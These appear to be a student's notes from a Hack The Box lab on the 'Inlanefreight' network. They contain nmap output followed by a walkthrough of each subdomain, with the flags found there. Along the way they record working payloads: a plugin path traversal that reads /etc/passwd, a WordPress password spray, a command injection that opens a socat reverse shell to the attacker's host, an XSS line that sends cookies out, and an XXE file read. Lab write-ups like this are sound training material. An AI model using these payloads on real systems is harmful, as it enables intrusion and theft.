10.129.229.147
NMAP
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 38 May 30 2022 flag.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.44
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7108b0c4f3ca9757649770f9fec50c7b (RSA)
| 256 45c3b51463993d9eb32251e59776e150 (ECDSA)
|_ 256 2ec2416646efb68195d5aa3523945538 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open domain (unknown banner: 1337_HTB_DNS)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ 1337_HTB_DNS
| dns-nsid:
|_ bind.version: 1337_HTB_DNS
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Inlanefreight
110/tcp open pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA TOP SASL AUTH-RESP-CODE RESP-CODES STLS PIPELINING UIDL
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-05-30T17:15:40
|_Not valid after: 2032-05-27T17:15:40
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
143/tcp open imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-05-30T17:15:40
|_Not valid after: 2032-05-27T17:15:40
|_imap-capabilities: STARTTLS IDLE LOGINDISABLEDA0001 post-login IMAP4rev1 listed have more capabilities ENABLE OK ID SASL-IR Pre-login LITERAL+ LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-05-30T17:15:40
|_Not valid after: 2032-05-27T17:15:40
|_imap-capabilities: IDLE have post-login IMAP4rev1 capabilities listed more LITERAL+ ENABLE OK ID SASL-IR Pre-login AUTH=PLAINA0001 LOGIN-REFERRALS
995/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-05-30T17:15:40
|_Not valid after: 2032-05-27T17:15:40
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA TOP AUTH-RESP-CODE PIPELINING RESP-CODES SASL(PLAIN) USER UIDL
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Support Center
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.93%I=7%D=1/10%Time=6962DF83%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,39,"\x007\0\x06\x85\0\0\x01\0\x01\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\r\x0c1337_HTB_DNS");
Service Info: Host: ubuntu; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
FootHold
FTP
- FTP enum returned a flag - HTB{0eb0ab788df18c3115ac43b1c06ae6c4}
DNS
- Zone transfer returned the available subdomains and a flag txt record
HTTP
inlanefreight.local monitoring.inlanefreight.local blog.inlanefreight.local careers.inlanefreight.local dev.inlanefreight.local flag.inlanefreight.local - returned a flag in the dns txt record HTB{DNs_ZOn3_Tr@nsf3r} gitlab.inlanefreight.local ir.inlanefreight.local status.inlanefreight.local support.inlanefreight.local tracking.inlanefreight.local vpn.inlanefreight.local
inlanefreight.local
- directory Listing on
/images
blog.inlanefreight.local
- drupal website
careers.inlanefreight.local
- register a user
- login as that user to find
profile?id=4vulnerable to idor - id=4 returns HTB{8f40ecf17f681612246fa5728c159e46} flag
dev.inlanefreight.local
- key vault site
- ffuf with raft to find
uploads.phpwhich has TRACE enabled. - the response headers to TRACE return an `X
- use that reader in the trace request to get a valid page and open the respnse in browser
- upload a php-reverse-shell.phar file by changing the MIME type and get a reverse shell
- find
HTB{57c7f6d939eeda90aa1488b15617b9fa} - we are in a docker container
gitlab.inlanefreight.local
- registered a new user to find the flag - HTB{32596e8376077c3ef8d5cf52f15279ba}
- CVE-2022-2884
- found shopdev2.inlanefreight.local
ir.inlanefreight.local
- wordpress 6.0
- ran wpscan
-
mail masta ->
curl -s http://ir.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd -
Enumerating users
wpscan --url http://ir.inlanefreight.local --enumerate u --no-updatewpscan --password-attack xmlrpc -t 20 -U ilfreightwp -P /opt/SecLists/mine/password.list --url 'http://ir.inlanefreight.local/' --no-update- found
ilfreightwp:password1
- found
- update the twentytwenty themes 404.php and get the flag
- HTB{e7134abea7438e937b87608eab0d979c}
- has interesting files
monitoring.inlanefreight.local
/ping.php?ip=127.0.0.1%0d%0als- get flag on
monitoring.inlanefreight.local/ping.php?ip=127.0.0.1%0d%0aCat${IFS}00112233_flag.txt- HTB{bdd8a93aff53fd63a0a14de4eba4cbc1}
- getting a reverse shell
/ping.php?ip=127.0.0.1%0d%0asocat${IFS}TCP:10.10.14.44:9001${IFS}EXEC:${PATH:0:1}bin${PATH:0:1}bash- returns shell as
webdev -
GO TO 2.md
status.inlanefreight.htb
- has a union based sqli
- dumped the below table for users
- admin hash not cracked
support.inlanefreight.local
- has a ticket.php, subscribe email field
- on ticket.php - message field. start nc
"><script>document.location='http://10.10.14.44/grabber.php?c='+btoa(document.cookie)</script>- returns a base64 cookie on nc.
- add the cookie in inspect element and go to the login page.
- HTB{1nS3cuR3_c00k135}
- login not vulnerable to sqli
shopdev2.inlanefreight.local
- login using admin:admin
- go to cart and try checking out. notice xxe
<!DOCTYPE foo [<!ENTITY xxe5ld2x SYSTEM "file:///flag.txt"> ]>to get flag HTB{dbca4dc5d99cdb3311404ea74921553c}
tracking.inlanefreight.local
- nothing here, pdf returned
- pdf contains the tracking number we entered
- https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-pdf-generators-a-complete-guide-to-finding-ssrf-vulnerabilities-in-pdf-generators
- HTB{49f0bad299687c62334182178bfd75d8}
vpn.inlanefreight.local
- login page